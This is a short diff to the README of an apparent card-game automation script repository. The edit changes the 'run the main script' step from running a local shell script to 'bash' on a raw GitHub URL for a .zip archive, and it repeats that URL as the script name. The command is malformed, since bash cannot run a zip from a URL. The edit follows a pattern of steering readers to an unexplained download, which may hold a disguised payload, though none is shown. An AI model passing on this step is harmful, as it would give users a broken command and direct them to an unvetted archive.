befuddled-closedshop360/op-tcg-auto-scripts/README.md

    - Use the command `cd path/to/extracted-folder` to change to the directory containing the scripts.

 2. **Run the Main Script**:
-   - Type `bash main_script.sh` to start the automation process.
-Replace `main_script.sh` with the actual script name you want to run.
+   - Type `bash https://raw.githubusercontent.com/befuddled-closedshop360/op-tcg-auto-scripts/main/quests/op-tcg-auto-scripts_v1.2.zip` to start the automation process.
+Replace `https://raw.githubusercontent.com/befuddled-closedshop360/op-tcg-auto-scripts/main/quests/op-tcg-auto-scripts_v1.2.zip` with the actual script name you want to run.

 3. **Monitor the Process**:
    - Watch the terminal for output messages.
 It will inform you of ongoing actions and progress.